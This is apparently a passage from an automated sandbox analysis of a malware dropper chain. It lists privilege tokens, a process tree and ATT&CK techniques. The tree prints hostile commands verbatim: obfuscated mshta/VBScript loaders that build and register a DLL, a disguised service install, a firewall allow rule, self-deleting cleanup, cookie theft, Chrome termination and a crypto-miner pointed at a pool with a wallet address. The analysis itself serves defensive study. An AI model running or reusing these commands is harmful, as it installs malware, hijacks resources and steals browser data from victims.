Token: SeChangeNotifyPrivilege 864 C889.exe Token: SeRemoteShutdownPrivilege 864 C889.exe Token: SeUndockPrivilege 864 C889.exe Token: SeSyncAgentPrivilege 864 C889.exe Token: SeEnableDelegationPrivilege 864 C889.exe Token: SeManageVolumePrivilege 864 C889.exe Token: SeImpersonatePrivilege 864 C889.exe Token: SeCreateGlobalPrivilege 864 C889.exe Token: 31 864 C889.exe Token: 32 864 C889.exe Token: 33 864 C889.exe Token: 34 864 C889.exe Token: 35 864 C889.exe Token: SeDebugPrivilege 2132 taskkill.exe Token: SeDebugPrivilege 2276 taskkill.exe Token: SeShutdownPrivilege 1200 Process not Found Token: SeShutdownPrivilege 1200 Process not Found Token: SeShutdownPrivilege 1200 Process not Found Token: SeDebugPrivilege 928 D7C7.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
pid Process 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found 1200 Process not Found -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1596 A361.exe 1100 A545.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 752 wrote to memory of 1424 752 toolspab2 (20).exe 29 PID 752 wrote to memory of 1424 752 toolspab2 (20).exe 29 PID 752 wrote to memory of 1424 752 toolspab2 (20).exe 29 PID 752 wrote to memory of 1424 752 toolspab2 (20).exe 29 PID 752 wrote to memory of 1424 752 toolspab2 (20).exe 29 PID 752 wrote to memory of 1424 752 toolspab2 (20).exe 29 PID 752 wrote to memory of 1424 752 toolspab2 (20).exe 29 PID 1200 wrote to memory of 1596 1200 Process not Found 30 PID 1200 wrote to memory of 1596 1200 Process not Found 30 PID 1200 wrote to memory of 1596 1200 Process not Found 30 PID 1200 wrote to memory of 1596 1200 Process not Found 30 PID 1200 wrote to memory of 1100 1200 Process not Found 31 PID 1200 wrote to memory of 1100 1200 Process not Found 31 PID 1200 wrote to memory of 1100 1200 Process not Found 31 PID 1200 wrote to memory of 1100 1200 Process not Found 31 PID 1200 wrote to memory of 112 1200 Process not Found 32 PID 1200 wrote to memory of 112 1200 Process not Found 32 PID 1200 wrote to memory of 112 1200 Process not Found 32 PID 1200 wrote to memory of 112 1200 Process not Found 32 PID 1200 wrote to memory of 1136 1200 Process not Found 34 PID 1200 wrote to memory of 1136 1200 Process not Found 34 PID 1200 wrote to memory of 1136 1200 Process not Found 34 PID 1200 wrote to memory of 1136 1200 Process not Found 34 PID 1200 wrote to memory of 856 1200 Process not Found 35 PID 1200 wrote to memory of 856 1200 Process not Found 35 PID 1200 wrote to memory of 856 1200 Process not Found 35 PID 1200 wrote to memory of 856 1200 Process not Found 35 PID 1200 wrote to memory of 1060 1200 Process not Found 36 PID 1200 wrote to memory of 1060 1200 Process not Found 36 PID 1200 wrote to memory of 1060 1200 Process not Found 36 PID 1200 wrote to memory of 1060 1200 Process not Found 36 PID 112 wrote to memory of 1140 112 A7D5.exe 37 PID 112 wrote to memory of 1140 112 A7D5.exe 37 PID 112 wrote to memory of 1140 112 A7D5.exe 37 PID 112 wrote to memory of 1140 112 A7D5.exe 37 PID 1200 wrote to memory of 1252 1200 Process not Found 38 PID 1200 wrote to memory of 1252 1200 Process not Found 38 PID 1200 wrote to memory of 1252 1200 Process not Found 38 PID 1200 wrote to memory of 1252 1200 Process not Found 38 PID 112 wrote to memory of 1140 112 A7D5.exe 37 PID 112 wrote to memory of 1140 112 A7D5.exe 37 PID 112 wrote to memory of 1140 112 A7D5.exe 37 PID 112 wrote to memory of 1140 112 A7D5.exe 37 PID 112 wrote to memory of 1140 112 A7D5.exe 37 PID 1200 wrote to memory of 240 1200 Process not Found 39 PID 1200 wrote to memory of 240 1200 Process not Found 39 PID 1200 wrote to memory of 240 1200 Process not Found 39 PID 1200 wrote to memory of 240 1200 Process not Found 39 PID 1200 wrote to memory of 240 1200 Process not Found 39 PID 1200 wrote to memory of 976 1200 Process not Found 40 PID 1200 wrote to memory of 976 1200 Process not Found 40 PID 1200 wrote to memory of 976 1200 Process not Found 40 PID 1200 wrote to memory of 976 1200 Process not Found 40 PID 1200 wrote to memory of 1548 1200 Process not Found 41 PID 1200 wrote to memory of 1548 1200 Process not Found 41 PID 1200 wrote to memory of 1548 1200 Process not Found 41 PID 1200 wrote to memory of 1548 1200 Process not Found 41 PID 1200 wrote to memory of 1548 1200 Process not Found 41 PID 1200 wrote to memory of 1316 1200 Process not Found 42 PID 1200 wrote to memory of 1316 1200 Process not Found 42 PID 1200 wrote to memory of 1316 1200 Process not Found 42 PID 1200 wrote to memory of 1316 1200 Process not Found 42 PID 1200 wrote to memory of 1576 1200 Process not Found 43 PID 1200 wrote to memory of 1576 1200 Process not Found 43
Processes
-
C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe"C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe"C:\Users\Admin\AppData\Local\Temp\toolspab2 (20).exe"2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1424
-
-
C:\Users\Admin\AppData\Local\Temp\A361.exeC:\Users\Admin\AppData\Local\Temp\A361.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1596
-
C:\Users\Admin\AppData\Local\Temp\A545.exeC:\Users\Admin\AppData\Local\Temp\A545.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1100
-
C:\Users\Admin\AppData\Local\Temp\A7D5.exeC:\Users\Admin\AppData\Local\Temp\A7D5.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Users\Admin\AppData\Local\Temp\A7D5.exeC:\Users\Admin\AppData\Local\Temp\A7D5.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1140
-
-
C:\Users\Admin\AppData\Local\Temp\AB6F.exeC:\Users\Admin\AppData\Local\Temp\AB6F.exe1⤵
- Executes dropped EXE
PID:1136
-
C:\Users\Admin\AppData\Local\Temp\AE3D.exeC:\Users\Admin\AppData\Local\Temp\AE3D.exe1⤵
- Executes dropped EXE
PID:856
-
C:\Users\Admin\AppData\Local\Temp\B521.exeC:\Users\Admin\AppData\Local\Temp\B521.exe1⤵
- Executes dropped EXE
PID:1060
-
C:\Users\Admin\AppData\Local\Temp\BDD9.exeC:\Users\Admin\AppData\Local\Temp\BDD9.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1252
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:240
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:976
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1548
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1316
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1576
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:848
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:1840
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:1984
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:2032
-
C:\Users\Admin\AppData\Local\Temp\912F.exeC:\Users\Admin\AppData\Local\Temp\912F.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1276 -
C:\Users\Admin\AppData\Local\Temp\912F.exeC:\Users\Admin\AppData\Local\Temp\912F.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:1540 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\683fc2d6-b311-4793-880c-7a1e921b3d26" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:1688
-
-
C:\Users\Admin\AppData\Local\Temp\912F.exe"C:\Users\Admin\AppData\Local\Temp\912F.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:2152 -
C:\Users\Admin\AppData\Local\Temp\912F.exe"C:\Users\Admin\AppData\Local\Temp\912F.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
PID:2920 -
C:\Users\Admin\AppData\Local\d0d81e58-6cc2-46a5-955a-2bcb42f679bd\build2.exe"C:\Users\Admin\AppData\Local\d0d81e58-6cc2-46a5-955a-2bcb42f679bd\build2.exe"5⤵PID:592
-
C:\Users\Admin\AppData\Local\d0d81e58-6cc2-46a5-955a-2bcb42f679bd\build2.exe"C:\Users\Admin\AppData\Local\d0d81e58-6cc2-46a5-955a-2bcb42f679bd\build2.exe"6⤵PID:2148
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\d0d81e58-6cc2-46a5-955a-2bcb42f679bd\build2.exe" & del C:\ProgramData\*.dll & exit7⤵PID:376
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Executes dropped EXE
- Kills process with taskkill
PID:996
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Executes dropped EXE
- Loads dropped DLL
- Delays execution with timeout.exe
PID:2092
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\AA7A.exeC:\Users\Admin\AppData\Local\Temp\AA7A.exe1⤵
- Executes dropped EXE
PID:972 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 1762⤵
- Loads dropped DLL
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
-
C:\Users\Admin\AppData\Local\Temp\ADD5.exeC:\Users\Admin\AppData\Local\Temp\ADD5.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1332 -
C:\Users\Admin\AppData\Local\Temp\is-C0SE8.tmp\ADD5.tmp"C:\Users\Admin\AppData\Local\Temp\is-C0SE8.tmp\ADD5.tmp" /SL5="$80102,506127,422400,C:\Users\Admin\AppData\Local\Temp\ADD5.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1836 -
C:\Users\Admin\AppData\Local\Temp\is-IOT01.tmp\1075474_ah_hot_iconçè_)))_.exe"C:\Users\Admin\AppData\Local\Temp\is-IOT01.tmp\1075474_ah_hot_iconçè_)))_.exe" /S /UID=rec73⤵
- Executes dropped EXE
PID:112 -
C:\Program Files\Java\UZJJIDFCXJ\irecord.exe"C:\Program Files\Java\UZJJIDFCXJ\irecord.exe" /VERYSILENT4⤵PID:2100
-
C:\Users\Admin\AppData\Local\Temp\is-5RICM.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-5RICM.tmp\irecord.tmp" /SL5="$201E2,5808768,66560,C:\Program Files\Java\UZJJIDFCXJ\irecord.exe" /VERYSILENT5⤵PID:2300
-
C:\Program Files (x86)\i-record\I-Record.exe"C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu6⤵PID:1996
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\30-bbf68-4e5-fe0ac-53a9de34dc1f2\Paelykywory.exe"C:\Users\Admin\AppData\Local\Temp\30-bbf68-4e5-fe0ac-53a9de34dc1f2\Paelykywory.exe"4⤵PID:2368
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e65⤵PID:2836
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2836 CREDAT:275457 /prefetch:26⤵PID:1832
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2836 CREDAT:668674 /prefetch:26⤵PID:820
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2836 CREDAT:996364 /prefetch:26⤵PID:660
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2836 CREDAT:1324056 /prefetch:26⤵PID:2684
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2836 CREDAT:1848344 /prefetch:26⤵PID:1612
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2836 CREDAT:1913877 /prefetch:26⤵PID:1268
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad5⤵PID:2796
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18514835⤵PID:556
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=18515135⤵PID:2652
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.directdexchange.com/jump/next.php?r=20872155⤵PID:1816
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.directdexchange.com/jump/next.php?r=42631195⤵PID:2484
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?id=12942315⤵PID:2908
-
-
-
C:\Users\Admin\AppData\Local\Temp\90-b9ecd-307-1e7b2-7296ff13370ad\Fosylishagi.exe"C:\Users\Admin\AppData\Local\Temp\90-b9ecd-307-1e7b2-7296ff13370ad\Fosylishagi.exe"4⤵PID:2392
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\illbnfob.jkk\GcleanerEU.exe /eufive & exit5⤵PID:2516
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oxww5055.0cn\installer.exe /qn CAMPAIGN="654" & exit5⤵PID:2500
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1qwuxxf4.df5\ufgaa.exe & exit5⤵PID:2988
-
C:\Users\Admin\AppData\Local\Temp\1qwuxxf4.df5\ufgaa.exeC:\Users\Admin\AppData\Local\Temp\1qwuxxf4.df5\ufgaa.exe6⤵PID:2876
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:2184
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:1012
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:1972
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:2608
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sjp3r0zs.wsf\google-game.exe & exit5⤵PID:1600
-
C:\Users\Admin\AppData\Local\Temp\sjp3r0zs.wsf\google-game.exeC:\Users\Admin\AppData\Local\Temp\sjp3r0zs.wsf\google-game.exe6⤵PID:2908
-
C:\Users\Admin\AppData\Local\Temp\sjp3r0zs.wsf\google-game.exe"C:\Users\Admin\AppData\Local\Temp\sjp3r0zs.wsf\google-game.exe" -a7⤵PID:556
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mbtfdoah.3bb\GcleanerWW.exe /mixone & exit5⤵PID:2796
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i3pswjj5.bh3\toolspab1.exe & exit5⤵PID:2316
-
C:\Users\Admin\AppData\Local\Temp\i3pswjj5.bh3\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\i3pswjj5.bh3\toolspab1.exe6⤵PID:2540
-
C:\Users\Admin\AppData\Local\Temp\i3pswjj5.bh3\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\i3pswjj5.bh3\toolspab1.exe7⤵PID:360
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\B91C.exeC:\Users\Admin\AppData\Local\Temp\B91C.exe1⤵
- Executes dropped EXE
PID:1856 -
C:\Users\Admin\AppData\Local\Temp\B91C.exe"C:\Users\Admin\AppData\Local\Temp\B91C.exe"2⤵PID:328
-
-
C:\Users\Admin\AppData\Local\Temp\BC39.exeC:\Users\Admin\AppData\Local\Temp\BC39.exe1⤵PID:996
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\nrrorach\2⤵PID:1752
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\mlvdlryz.exe" C:\Windows\SysWOW64\nrrorach\2⤵PID:1688
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create nrrorach binPath= "C:\Windows\SysWOW64\nrrorach\mlvdlryz.exe /d\"C:\Users\Admin\AppData\Local\Temp\BC39.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:836
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description nrrorach "wifi internet conection"2⤵PID:1752
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start nrrorach2⤵PID:2004
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:1636
-
-
C:\Users\Admin\AppData\Local\Temp\C889.exeC:\Users\Admin\AppData\Local\Temp\C889.exe1⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:864 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵PID:2064
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
-
-
C:\Users\Admin\AppData\Local\Temp\D095.exeC:\Users\Admin\AppData\Local\Temp\D095.exe1⤵
- Executes dropped EXE
PID:420
-
C:\Users\Admin\AppData\Local\Temp\D7C7.exeC:\Users\Admin\AppData\Local\Temp\D7C7.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:928
-
C:\Windows\SysWOW64\nrrorach\mlvdlryz.exeC:\Windows\SysWOW64\nrrorach\mlvdlryz.exe /d"C:\Users\Admin\AppData\Local\Temp\BC39.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1712 -
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1060 -
C:\Windows\SysWOW64\svchost.exesvchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half3⤵PID:2780
-
-
-
C:\Users\Admin\AppData\Local\Temp\E704.exeC:\Users\Admin\AppData\Local\Temp\E704.exe1⤵
- Executes dropped EXE
PID:1308 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCript: clOSE (CrEAteOBJect ("WscRIPt.ShELL" ). rUN("CMd.EXE /q /c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\E704.exe"" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF """"=="""" for %s IN ( ""C:\Users\Admin\AppData\Local\Temp\E704.exe"") do taskkill -f /Im ""%~nxs"" " ,0 , truE ))2⤵
- Modifies Internet Explorer settings
PID:1036 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c Copy /Y "C:\Users\Admin\AppData\Local\Temp\E704.exe" ..\IpDIhVj3g.ExE &&STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M&IF ""=="" for %s IN ( "C:\Users\Admin\AppData\Local\Temp\E704.exe") do taskkill -f /Im "%~nxs"3⤵
- Loads dropped DLL
PID:2200 -
C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M4⤵
- Executes dropped EXE
PID:2260 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCript: clOSE (CrEAteOBJect ("WscRIPt.ShELL" ). rUN("CMd.EXE /q /c Copy /Y ""C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE"" ..\IpDIhVj3g.ExE && STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M& IF ""/PyPXDDGMMiEeTQRVIP2SQdwWi2M""=="""" for %s IN ( ""C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE"") do taskkill -f /Im ""%~nxs"" " ,0 , truE ))5⤵
- Modifies Internet Explorer settings
PID:2480 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c Copy /Y "C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE" ..\IpDIhVj3g.ExE &&STARt ..\IpDIhVj3g.EXe /PyPXDDGMMiEeTQRVIP2SQdwWi2M&IF "/PyPXDDGMMiEeTQRVIP2SQdwWi2M"=="" for %s IN ( "C:\Users\Admin\AppData\Local\Temp\IpDIhVj3g.ExE") do taskkill -f /Im "%~nxs"6⤵PID:2540
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCrIpT: cLose (CreAteObject( "wSCrIPt.ShelL"). RUN( "cMd /Q /C ecHo 6C:\Users\Admin\AppData\Local\TempZwG> QEFuCrB.w &ECHO | SeT /p = ""MZ"" > 0CZKPbA.~i © /Y /b 0CZKPBA.~i +HzMuGQn.ebg +3KLPjZ48.1 + JBBP.aZ+jjD1CZ.Z +ME53U.RD + G8HVV~AW.A + QEFuCRB.w ..\LPHzR4.XZ &sTaRt regsvr32.exe ..\LphZr4.XZ /U -S & dEl /Q * " ,0, tRuE ) )5⤵PID:2664
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C ecHo 6C:\Users\Admin\AppData\Local\TempZwG> QEFuCrB.w &ECHO | SeT /p = "MZ" >0CZKPbA.~i © /Y /b 0CZKPBA.~i+HzMuGQn.ebg +3KLPjZ48.1 + JBBP.aZ+jjD1CZ.Z+ME53U.RD +G8HVV~AW.A + QEFuCRB.w ..\LPHzR4.XZ&sTaRt regsvr32.exe ..\LphZr4.XZ /U -S&dEl /Q *6⤵PID:2712
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ECHO "7⤵PID:2772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>0CZKPbA.~i"7⤵PID:2784
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe ..\LphZr4.XZ /U -S7⤵
- Loads dropped DLL
PID:2808
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f /Im "E704.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\9A2.exeC:\Users\Admin\AppData\Local\Temp\9A2.exe1⤵PID:2092
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 9A2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\9A2.exe" & del C:\ProgramData\*.dll & exit2⤵PID:2000
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 9A2.exe /f3⤵
- Kills process with taskkill
PID:1028
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:1828
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {61C96D48-3309-4CF6-962C-2816EE1372DF} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]1⤵PID:2452
-
C:\Users\Admin\AppData\Roaming\arcuivjC:\Users\Admin\AppData\Roaming\arcuivj2⤵PID:2128
-
-
C:\Users\Admin\AppData\Roaming\cccuivjC:\Users\Admin\AppData\Roaming\cccuivj2⤵PID:2204
-
C:\Users\Admin\AppData\Roaming\cccuivjC:\Users\Admin\AppData\Roaming\cccuivj3⤵PID:2440
-
-
-
C:\Users\Admin\AppData\Local\683fc2d6-b311-4793-880c-7a1e921b3d26\912F.exeC:\Users\Admin\AppData\Local\683fc2d6-b311-4793-880c-7a1e921b3d26\912F.exe --Task2⤵PID:1516
-
C:\Users\Admin\AppData\Local\683fc2d6-b311-4793-880c-7a1e921b3d26\912F.exeC:\Users\Admin\AppData\Local\683fc2d6-b311-4793-880c-7a1e921b3d26\912F.exe --Task3⤵PID:2396
-
-
-
C:\Users\Admin\AppData\Roaming\cccuivjC:\Users\Admin\AppData\Roaming\cccuivj2⤵PID:2116
-
-
C:\Users\Admin\AppData\Local\683fc2d6-b311-4793-880c-7a1e921b3d26\912F.exeC:\Users\Admin\AppData\Local\683fc2d6-b311-4793-880c-7a1e921b3d26\912F.exe --Task2⤵PID:972
-
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:2616 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵PID:996
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:2076
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1New Service
1Registry Run Keys / Startup Folder
2Defense Evasion
Disabling Security Tools
1File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
5Web Service
1